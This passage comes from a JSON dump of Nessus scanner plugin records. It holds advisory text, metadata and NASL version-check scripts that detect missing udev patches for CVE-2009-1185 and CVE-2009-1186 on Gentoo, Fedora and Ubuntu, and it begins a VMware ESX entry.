following two vulnerabilities:\n udev does not verify the origin of NETLINK messages properly (CVE-2009-1185).\n A buffer overflow exists in the util_path_encode() function in lib/libudev-util.c (CVE-2009-1186).\n Impact :\n\n A local attacker could gain root privileges by sending specially crafted NETLINK messages to udev or cause a Denial of Service.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2009-04-21T00:00:00", "type": "nessus", "title": "GLSA-200904-18 : udev: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:udev", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200904-18.NASL", "href": "https://www.tenable.com/plugins/nessus/36197", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200904-18.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36197);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_bugtraq_id(34536, 34539);\n script_xref(name:\"GLSA\", value:\"200904-18\");\n\n script_name(english:\"GLSA-200904-18 : udev: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200904-18\n(udev: Multiple vulnerabilities)\n\n Sebastian Krahmer of SUSE discovered the following two vulnerabilities:\n udev does not verify the origin of NETLINK messages\n properly (CVE-2009-1185).\n A buffer overflow exists in the\n util_path_encode() function in lib/libudev-util.c (CVE-2009-1186).\n \nImpact :\n\n A local attacker could gain root privileges by sending specially\n crafted NETLINK messages to udev or cause a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200904-18\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All udev users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-fs/udev-124-r2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:udev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"sys-fs/udev\", unaffected:make_list(\"ge 124-r2\"), vulnerable:make_list(\"lt 124-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"udev\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:44", "description": "udev provides a user-space API and implements a dynamic device directory, providing only the devices present on the system. udev replaces devfs in order to provide greater hot plug functionality.\nNetlink is a datagram oriented service, used to transfer information between kernel modules and user-space processes. It was discovered that udev did not properly check the origin of Netlink messages. A local attacker could use this flaw to gain root privileges via a crafted Netlink message sent to udev, causing it to create a world- writable block device file for an existing system block device (for example, the root file system). (CVE-2009-1185) An integer overflow flaw, potentially leading to heap-based buffer overflow was found in one of the utilities providing functionality of the udev device information interface. An attacker could use this flaw to cause a denial of service, or possibly, to execute arbitrary code by providing a specially crafted arguments as input to this utility.\n(CVE-2009-1186) Thanks to Sebastian Krahmer of the SUSE Security Team for responsibly reporting this flaw. Users of udev are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, the udevd daemon will be restarted automatically.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2009-04-17T00:00:00", "type": "nessus", "title": "Fedora 9 : udev-124-4.fc9 (2009-3712)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:udev", "cpe:/o:fedoraproject:fedora:9"], "id": "FEDORA_2009-3712.NASL", "href": "https://www.tenable.com/plugins/nessus/36175", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-3712.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36175);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_bugtraq_id(34536, 34539);\n script_xref(name:\"FEDORA\", value:\"2009-3712\");\n\n script_name(english:\"Fedora 9 : udev-124-4.fc9 (2009-3712)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"udev provides a user-space API and implements a dynamic device\ndirectory, providing only the devices present on the system. udev\nreplaces devfs in order to provide greater hot plug functionality.\nNetlink is a datagram oriented service, used to transfer information\nbetween kernel modules and user-space processes. It was discovered\nthat udev did not properly check the origin of Netlink messages. A\nlocal attacker could use this flaw to gain root privileges via a\ncrafted Netlink message sent to udev, causing it to create a world-\nwritable block device file for an existing system block device (for\nexample, the root file system). (CVE-2009-1185) An integer overflow\nflaw, potentially leading to heap-based buffer overflow was found in\none of the utilities providing functionality of the udev device\ninformation interface. An attacker could use this flaw to cause a\ndenial of service, or possibly, to execute arbitrary code by providing\na specially crafted arguments as input to this utility.\n(CVE-2009-1186) Thanks to Sebastian Krahmer of the SUSE Security Team\nfor responsibly reporting this flaw. Users of udev are advised to\nupgrade to these updated packages, which contain a backported patch to\ncorrect this issue. After installing the update, the udevd daemon will\nbe restarted automatically.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=495051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=495052\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-April/022408.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?19591714\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected udev package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:udev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:9\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 9.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC9\", reference:\"udev-124-4.fc9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"udev\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:18:01", "description": "Sebastian Krahmer discovered that udev did not correctly validate netlink message senders. A local attacker could send specially crafted messages to udev in order to gain root privileges. (CVE-2009-1185)\n\nSebastian Krahmer discovered a buffer overflow in the path encoding routines in udev. A local attacker could exploit this to crash udev, leading to a denial of service. (CVE-2009-1186).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2009-04-23T00:00:00", "type": "nessus", "title": "Ubuntu 6.06 LTS / 7.10 / 8.04 LTS / 8.10 : udev vulnerabilities (USN-758-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libvolume-id-dev", "p-cpe:/a:canonical:ubuntu_linux:libvolume-id0", "p-cpe:/a:canonical:ubuntu_linux:udev", "p-cpe:/a:canonical:ubuntu_linux:volumeid", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts", "cpe:/o:canonical:ubuntu_linux:7.10", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.10"], "id": "UBUNTU_USN-758-1.NASL", "href": "https://www.tenable.com/plugins/nessus/36530", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-758-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36530);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_xref(name:\"USN\", value:\"758-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 7.10 / 8.04 LTS / 8.10 : udev vulnerabilities (USN-758-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sebastian Krahmer discovered that udev did not correctly validate\nnetlink message senders. A local attacker could send specially crafted\nmessages to udev in order to gain root privileges. (CVE-2009-1185)\n\nSebastian Krahmer discovered a buffer overflow in the path encoding\nroutines in udev. A local attacker could exploit this to crash udev,\nleading to a denial of service. (CVE-2009-1186).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/758-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libvolume-id-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libvolume-id0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:udev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:volumeid\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|7\\.10|8\\.04|8\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 7.10 / 8.04 / 8.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"udev\", pkgver:\"079-0ubuntu35.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libvolume-id-dev\", pkgver:\"113-0ubuntu17.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libvolume-id0\", pkgver:\"113-0ubuntu17.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"udev\", pkgver:\"113-0ubuntu17.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"volumeid\", pkgver:\"113-0ubuntu17.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libvolume-id-dev\", pkgver:\"117-8ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libvolume-id0\", pkgver:\"117-8ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"udev\", pkgver:\"117-8ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libvolume-id-dev\", pkgver:\"124-9ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libvolume-id0\", pkgver:\"124-9ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"udev\", pkgver:\"124-9ubuntu0.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvolume-id-dev / libvolume-id0 / udev / volumeid\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:15:21", "description": "udev provides a user-space API and implements a dynamic device directory, providing only the devices present on the system. udev replaces devfs in order to provide greater hot plug functionality.\nNetlink is a datagram oriented service, used to transfer information between kernel modules and user-space processes. It was discovered that udev did not properly check the origin of Netlink messages. A local attacker could use this flaw to gain root privileges via a crafted Netlink message sent to udev, causing it to create a world- writable block device file for an existing system block device (for example, the root file system). (CVE-2009-1185) An integer overflow flaw, potentially leading to heap-based buffer overflow was found in one of the utilities providing functionality of the udev device information interface. An attacker could use this flaw to cause a denial of service, or possibly, to execute arbitrary code by providing a specially crafted arguments as input to this utility.\n(CVE-2009-1186) Thanks to Sebastian Krahmer of the SUSE Security Team for responsibly reporting this flaw. Users of udev are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, the udevd daemon will be restarted automatically.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2009-04-23T00:00:00", "type": "nessus", "title": "Fedora 10 : udev-127-5.fc10 (2009-3711)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:udev", "cpe:/o:fedoraproject:fedora:10"], "id": "FEDORA_2009-3711.NASL", "href": "https://www.tenable.com/plugins/nessus/36703", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-3711.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36703);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_bugtraq_id(34536, 34539);\n script_xref(name:\"FEDORA\", value:\"2009-3711\");\n\n script_name(english:\"Fedora 10 : udev-127-5.fc10 (2009-3711)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"udev provides a user-space API and implements a dynamic device\ndirectory, providing only the devices present on the system. udev\nreplaces devfs in order to provide greater hot plug functionality.\nNetlink is a datagram oriented service, used to transfer information\nbetween kernel modules and user-space processes. It was discovered\nthat udev did not properly check the origin of Netlink messages. A\nlocal attacker could use this flaw to gain root privileges via a\ncrafted Netlink message sent to udev, causing it to create a world-\nwritable block device file for an existing system block device (for\nexample, the root file system). (CVE-2009-1185) An integer overflow\nflaw, potentially leading to heap-based buffer overflow was found in\none of the utilities providing functionality of the udev device\ninformation interface. An attacker could use this flaw to cause a\ndenial of service, or possibly, to execute arbitrary code by providing\na specially crafted arguments as input to this utility.\n(CVE-2009-1186) Thanks to Sebastian Krahmer of the SUSE Security Team\nfor responsibly reporting this flaw. Users of udev are advised to\nupgrade to these updated packages, which contain a backported patch to\ncorrect this issue. After installing the update, the udevd daemon will\nbe restarted automatically.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=495051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=495052\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-April/022409.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?25580fdb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected udev package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:udev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"udev-127-5.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"udev\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:18", "description": "The remote VMware ESX host is missing a security-related patch. It is, therefore, affected by multiple vulnerabilities :\n\n - A flaw exists in sudo in file parse.c due to a failure to properly interpret a system group (%group) in the sudoers configuration file when handling authorization decisions for users belonging to that group. A local attacker can exploit this to gain root privileges via a crafted sudo command. (CVE-2009-0034)\n\n - A flaw exists in the redirect implementation in libcurl that allows arbitrary Location values to be accepted when CURLOPT_FOLLOWLOCATION is enabled. An attacker with control of a remote HTTP server can exploit this, via crafted redirect URLs, to trigger requests to intranet servers, to read or write arbitrary files, or to execute arbitrary commands. (CVE-2009-0037)\n\n - A flaw exists in udev due to a failure to verify that a NETLINK message originates from the kernel space. A local attacker can exploit this, via a crafted NETLINK message, to gain elevated privileges on the root file system. (CVE-2009-1185)", "cvss3": {}, "published": "2016-03-03T00:00:00", "type": "nessus", "title": "VMware ESX Multiple Vulnerabilities (VMSA-2009-0009) (remote check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0034", "CVE-2009-0037", "CVE-2009-1185"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:vmware:esx"], "id": "VMWARE_VMSA-2009-0009_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/89115", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89115);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2009-0034\",\n \"CVE-2009-0037\",\n \"CVE-2009-1185\"\n );\n script_bugtraq_id(\n 33517,\n 33962,\n 34536\n );\n script_xref(name:\"VMSA\", value:\"2009-0009\");\n script_xref(name:\"EDB-ID\", value:\"8572\");\n script_xref(name:\"EDB-ID\", value:\"21848\");\n\n script_name(english:\"VMware ESX Multiple Vulnerabilities (VMSA-2009-0009) (remote check)\");\n script_summary(english:\"Checks the ESX version and build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESX host is missing a security-related patch. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - A flaw exists in sudo in file parse.c due to a failure\n to properly interpret a system group (%group) in the\n sudoers configuration file when handling 